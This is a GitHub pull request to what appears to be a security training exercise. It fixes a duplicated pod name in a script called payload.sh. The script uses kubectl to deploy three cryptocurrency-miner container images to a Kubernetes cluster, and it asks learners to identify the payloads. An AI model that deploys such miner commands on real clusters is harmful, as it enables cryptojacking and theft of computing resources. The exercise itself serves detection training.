### PR TITLE
Rename duplicated pod_name

### DIFF
--- a/starter/scripts/payload.sh
+++ b/starter/scripts/payload.sh
@@ -4,6 +4,6 @@ kubectl run --kubeconfig kube_config_cluster.yml moneropool --image=servethehome
 #start minergate
 kubectl run --kubeconfig kube_config_cluster.yml minergate --image=servethehome/monero_cpu_minergate:latest --replicas=1
 #start cryptotonight
-kubectl run --kubeconfig kube_config_cluster.yml minergate --image=servethehome/universal_cryptonight:latest --replicas=1
+kubectl run --kubeconfig kube_config_cluster.yml cryptotonight --image=servethehome/universal_cryptonight:latest --replicas=1
 
 echo "Can you identify the payload(s)?"


### PR DESCRIPTION
This change renames the duplicated pod name
According to this [stackoverflow](https://stackoverflow.com/a/54112228) response, pod name needs to be unique. 

The script was executed and created 2 pods instead of 3
![suspecious_nodes_running](https://user-images.githubusercontent.com/7910856/123203837-3c421700-d4b7-11eb-8d8c-e0de94a04edc.png)

# The fix
Note the script with the duplicated pod name
![2021-06-24_06-47](https://user-images.githubusercontent.com/7910856/123204381-444e8680-d4b8-11eb-92a4-296e86573d38.png)
With the update pod name
![2021-06-24_06-48](https://user-images.githubusercontent.com/7910856/123204375-40baff80-d4b8-11eb-8c33-021c75690da5.png)

